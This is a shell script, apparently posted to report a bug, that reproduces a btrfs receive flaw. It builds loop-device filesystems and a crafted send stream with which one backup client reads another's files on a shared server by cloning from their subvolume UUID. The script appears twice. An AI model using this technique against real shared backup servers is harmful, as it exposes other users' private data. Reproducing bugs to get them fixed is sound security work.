GrahamCobb · September 6, 2016 16:56
diff --git a/btrfs-recv-test b/btrfs-recv-test
 #!/bin/sh -x
 # Reproduce btrfs receive exposure of files outside path
 # Background: assume two clients Alice and Mallory are using btrfs send to
 # send snapshots to a single server for backup. Each client has their
 # own directory on the server and the server always receives into a path
 # starting at their own directory. This script demostrates that Mallory can
 # get access to Alice's files if he knows Alice's subvolume UUID.

 CHROOT="-C"

 # Create Alice's source subvolume
 dd if=/dev/zero of=source.disk bs=1M count=100
 mkfs.btrfs source.disk
 mkdir source
 mount -o loop source.disk source
 btrfs subv create source/testvol
 btrfs subv list -u source
 dd if=/dev/urandom of=source/testvol/testfile bs=1M count=10
 btrfs subv snap -r source/testvol source/testvol.snap
 btrfs send -f Alice.send source/testvol.snap
 # Alice's subvolume file is a bit over 10M...
 ls -lh Alice.send

 # Now create Mallory's hand-crafted file
 # To make the script work we create this using Alice's source
 # but in reality Mallory could create this file easiy by hand
 # as long as they know (or can guess) the UUID
 btrfs subv snap source/testvol source/Mallory
 btrfs subv snap -r source/Mallory source/Mallory.snap
 btrfs send -f Mallory.send -c source/testvol.snap source/Mallory.snap
 ls -l Mallory.send

 umount source

 # Set up backup server disk
 dd if=/dev/zero of=server.disk bs=1M count=100
 mkfs.btrfs server.disk
 mkdir server
 mount -o loop server.disk server

 # Receive Alice's backup
 mkdir server/Alice
 btrfs receive -vv $CHROOT -f Alice.send server/Alice
 ls -lR server/Alice
 cksum server/Alice/testvol.snap/testfile

 # Receive Mallory's backup
 mkdir server/Mallory
 btrfs receive -vv $CHROOT -f Mallory.send server/Mallory
 ls -lR server/Mallory
 cksum server/Mallory/Mallory.snap/testfile

 umount server
	#!/bin/sh -x
	# Reproduce btrfs receive exposure of files outside path
	# Background: assume two clients Alice and Mallory are using btrfs send to
	# send snapshots to a single server for backup. Each client has their
	# own directory on the server and the server always receives into a path
	# starting at their own directory. This script demostrates that Mallory can
	# get access to Alice's files if he knows Alice's subvolume UUID.

	CHROOT="-C"

	# Create Alice's source subvolume
	dd if=/dev/zero of=source.disk bs=1M count=100
	mkfs.btrfs source.disk
	mkdir source
	mount -o loop source.disk source
	btrfs subv create source/testvol
	btrfs subv list -u source
	dd if=/dev/urandom of=source/testvol/testfile bs=1M count=10
	btrfs subv snap -r source/testvol source/testvol.snap
	btrfs send -f Alice.send source/testvol.snap
	# Alice's subvolume file is a bit over 10M...
	ls -lh Alice.send

	# Now create Mallory's hand-crafted file
	# To make the script work we create this using Alice's source
	# but in reality Mallory could create this file easiy by hand
	# as long as they know (or can guess) the UUID
	btrfs subv snap source/testvol source/Mallory
	btrfs subv snap -r source/Mallory source/Mallory.snap
	btrfs send -f Mallory.send -c source/testvol.snap source/Mallory.snap
	ls -l Mallory.send

	umount source

	# Set up backup server disk
	dd if=/dev/zero of=server.disk bs=1M count=100
	mkfs.btrfs server.disk
	mkdir server
	mount -o loop server.disk server

	# Receive Alice's backup
	mkdir server/Alice
	btrfs receive -vv $CHROOT -f Alice.send server/Alice
	ls -lR server/Alice
	cksum server/Alice/testvol.snap/testfile

	# Receive Mallory's backup
	mkdir server/Mallory
	btrfs receive -vv $CHROOT -f Mallory.send server/Mallory
	ls -lR server/Mallory
	cksum server/Mallory/Mallory.snap/testfile

	umount server